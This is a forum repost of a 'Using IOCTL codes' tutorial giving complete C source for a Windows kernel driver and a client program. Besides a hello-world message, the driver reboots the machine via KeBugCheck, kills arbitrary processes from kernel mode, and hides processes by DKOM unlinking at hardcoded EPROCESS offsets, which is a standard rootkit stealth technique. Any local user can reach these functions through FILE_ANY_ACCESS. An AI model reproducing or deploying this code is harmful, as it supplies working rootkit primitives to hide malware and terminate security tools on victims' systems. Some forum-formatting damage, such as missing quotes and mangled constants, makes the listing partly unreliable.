Nytro Posted August 23, 2013 Report Posted August 23, 2013 [h=1]Using IOCTL codes[/h][h=3]zwclose7[/h]I am studying IOCTL codes, so I written a driver to test how IOCTL codes works.This example has two parts: kernel mode driver and user mode application.The user mode application send IOCTL codes to the kernel mode driver, and the driver and perform some actions.The driver include following features:1) Display strings in DebugView.2) Restart the operating system.3) Terminate running processes.4) Hide running process using DKOM.User mode application:Usage: IOCTLTest [command] [parameters]...Commands:IOCTLTest hello [string]Send a string to the driver, which will be displayed in DebugView.IOCTLTest restartCause the driver to call KeBugCheck with POWER_FAILURE_SIMULATE, which will restart the operating system.IOCTLTest kill [PID]Terminate a process using ZwTerminateProcess function.IOCTLTest hide [PID]Hide a process using DKOM.Installing the driver:To install the driver, open the install.bat file. This will install the driver, and then load it.Source code:Driver#include <ntifs.h>#include <ntddk.h>#define IOCTL_HELLO_WORLD CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)#define IOCTL_RESTART_SYSTEM CTL_CODE(FILE_DEVICE_UNKNOWN,0x901,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)#define IOCTL_TERMINATE_PROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,0x902,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)#define IOCTL_HIDE_PROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,0x903,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)PDEVICE_OBJECT pDeviceObject;UNICODE_STRING dev,dos;void Unload(PDRIVER_OBJECT pDriverObject){ DbgPrint("Unload routine called.\n"); IoDeleteSymbolicLink(&dos); IoDeleteDevice(pDriverObject->DeviceObject);}NTSTATUS Create(PDEVICE_OBJECT DeviceObject,PIRP irp){ DbgPrint("Create routine called.\n"); irp->IoStatus.Status=STATUS_SUCCESS; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return STATUS_SUCCESS;}NTSTATUS Close(PDEVICE_OBJECT DeviceObject,PIRP irp){ DbgPrint("Close routine called.\n"); irp->IoStatus.Status=STATUS_SUCCESS; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return STATUS_SUCCESS;}NTSTATUS IOCTL(PDEVICE_OBJECT DeviceObject,PIRP irp){ PIO_STACK_LOCATION io; PEPROCESS ep; PLIST_ENTRY PrevListEntry,CurrentListEntry,NextListEntry; HANDLE hProcess; NTSTATUS status; ULONG MinorVersion,MajorVersion,offset,size; CLIENT_ID cid; OBJECT_ATTRIBUTES oa; DbgPrint("IOCTL routine called.\n"); io=IoGetCurrentIrpStackLocation(irp); switch(io->Parameters.DeviceIoControl.IoControlCode) { case IOCTL_HELLO_WORLD: DbgPrint("Data from user mode: %s\n",irp->AssociatedIrp.SystemBuffer); // Display the user mode message. break; case IOCTL_RESTART_SYSTEM: KeBugCheck(POWER_FAILURE_SIMULATE); // Calling KeBugCheck with POWER_FAILURE_SIMULATE will restart the computer, no BSOD is displayed. break; case IOCTL_TERMINATE_PROCESS: // Terminate a process using ZwTerminateProcess function. DbgPrint("Terminating process %d\n",*(PHANDLE)irp->AssociatedIrp.SystemBuffer); cid.UniqueProcess=*(PHANDLE)irp->AssociatedIrp.SystemBuffer; cid.UniqueThread=0; InitializeObjectAttributes(&oa,NULL,OBJ_KERNEL_HANDLE,NULL,NULL); if(!NT_SUCCESS(status=ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oa,&cid))) { irp->IoStatus.Status=status; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return status; } if(!NT_SUCCESS(status=ZwTerminateProcess(hProcess,1))) { ZwClose(hProcess); irp->IoStatus.Status=status; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return status; } ZwClose(hProcess); irp->IoStatus.Status=status; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return status; case IOCTL_HIDE_PROCESS: // Hide a process using DKOM. DbgPrint("Hiding process %d with DKOM.\n",*(PHANDLE)irp->AssociatedIrp.SystemBuffer); if(!NT_SUCCESS(status=PsLookupProcessByProcessId(*(PHANDLE)irp->AssociatedIrp.SystemBuffer,&ep))) { irp->IoStatus.Status=status; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return status; } PsGetVersion(&MajorVersion,&MinorVersion,NULL,NULL); // Detect operating system version. if(MajorVersion==5 && MinorVersion==0) { offset=0xa0; } else if(MajorVersion==5 && MinorVersion==1) { offset=0x88; } else if(MajorVersion==6 && MinorVersion==0) { offset=0xa0; } else if(MajorVersion==6 && MinorVersion==1) { offset=0xb8; } else { ObDereferenceObject(ep); irp->IoStatus.Status=STATUS_UNSUCCESSFUL; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return STATUS_UNSUCCESSFUL; } CurrentListEntry=(PLIST_ENTRY)((PUCHAR)ep+offset); PrevListEntry=(PLIST_ENTRY)CurrentListEntry->Blink; NextListEntry=(PLIST_ENTRY)CurrentListEntry->Flink; PrevListEntry->Flink=(PLIST_ENTRY)CurrentListEntry->Flink; NextListEntry->Blink=(PLIST_ENTRY)CurrentListEntry->Blink; CurrentListEntry->Flink=(PLIST_ENTRY)&(CurrentListEntry->Flink); CurrentListEntry->Blink=(PLIST_ENTRY)&(CurrentListEntry->Flink); ObDereferenceObject(ep); break; default: DbgPrint("Unknown IOCTL code: %#x\n",io->Parameters.DeviceIoControl.IoControlCode); irp->IoStatus.Status=STATUS_INVALID_DEVICE_REQUEST; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return STATUS_INVALID_DEVICE_REQUEST; } irp->IoStatus.Status=STATUS_SUCCESS; irp->IoStatus.Information=0; IoCompleteRequest(irp,IO_NO_INCREMENT); return STATUS_SUCCESS;}NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath){ DbgPrint("DriverEntry called.\n"); RtlInitUnicodeString(&dev,L"\\Device\\ioctl"); RtlInitUnicodeString(&dos,L\\DosDevices\\ioctl); IoCreateDevice(pDriverObject,0,&dev,FILE_DEVICE_UNKNOWN,FILE_DEVICE_SECURE_OPEN,FALSE,&pDeviceObject); IoCreateSymbolicLink(&dos,&dev); pDriverObject->MajorFunction[iRP_MJ_CREATE]=Create; pDriverObject->MajorFunction[iRP_MJ_CLOSE]=Close; pDriverObject->MajorFunction[iRP_MJ_DEVICE_CONTROL]=IOCTL; pDriverObject->DriverUnload=Unload; pDeviceObject->Flags|=DO_DIRECT_IO; pDeviceObject->Flags&=~DO_DEVICE_INITIALIZING; DbgPrint("IOCTL Test driver loaded.\n"); return STATUS_SUCCESS;}Application#include <stdio.h>#include <Windows.h>#define IOCTL_HELLO_WORLD CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)#define IOCTL_RESTART_SYSTEM CTL_CODE(FILE_DEVICE_UNKNOWN,0x901,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)#define IOCTL_TERMINATE_PROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,0x902,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)#define IOCTL_HIDE_PROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,0x903,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)int main(int argc,char* argv[]){ HANDLE hFile; DWORD dw,pid; BOOL bResult; if(argc<2) { printf("\nUsage: IOCTLTest [command] [parameter]\n"); return 1; } hFile=CreateFile("\\\\.\\ioctl",GENERIC_ALL,0,NULL,OPEN_EXISTING,0,NULL); if(hFile==INVALID_HANDLE_VALUE) { printf("\nError: Unable to open the IOCTL Test driver. (%d)\n",GetLastError()); return 1; } if(!stricmp("hello",argv[1])) { bResult=DeviceIoControl(hFile,IOCTL_HELLO_WORLD,argv[1],strlen(argv[1]),NULL,0,&dw,NULL); if(!bResult) { printf("\nError: %d\n",GetLastError()); CloseHandle(hFile); return 1; } printf("Successfully sent control code to driver.\n"); CloseHandle(hFile); return 0; } if(!stricmp("restart",argv[1])) { bResult=DeviceIoControl(hFile,IOCTL_RESTART_SYSTEM,NULL,0,NULL,0,&dw,NULL); if(!bResult) { printf("\nError: %d\n",GetLastError()); CloseHandle(hFile); return 1; } printf("\nSuccessfully sent control code to driver.\n"); CloseHandle(hFile); return 0; } if(!stricmp("kill",argv[1])) { pid=atoi(argv[2]); bResult=DeviceIoControl(hFile,IOCTL_TERMINATE_PROCESS,&pid,sizeof(DWORD),NULL,0,&dw,NULL); if(!bResult) { printf("\nError: %d\n",GetLastError()); CloseHandle(hFile); return 1; } printf("\nSuccessfully sent control code to driver.\n"); CloseHandle(hFile); return 0; } if(!stricmp("hide",argv[1])) { pid=atoi(argv[2]); bResult=DeviceIoControl(hFile,IOCTL_HIDE_PROCESS,&pid,sizeof(DWORD),NULL,0,&dw,NULL); if(!bResult) { printf("\nError: %d\n",GetLastError()); CloseHandle(hFile); return 1; } printf("\nSuccessfully sent control code to driver.\n"); CloseHandle(hFile); return 0; } return 0;} [h=4]Attached Files[/h] IOCTLTest.zip 348.52K 1 downloadsSursa: Using IOCTL codes - rohitab.com - Forums Quote
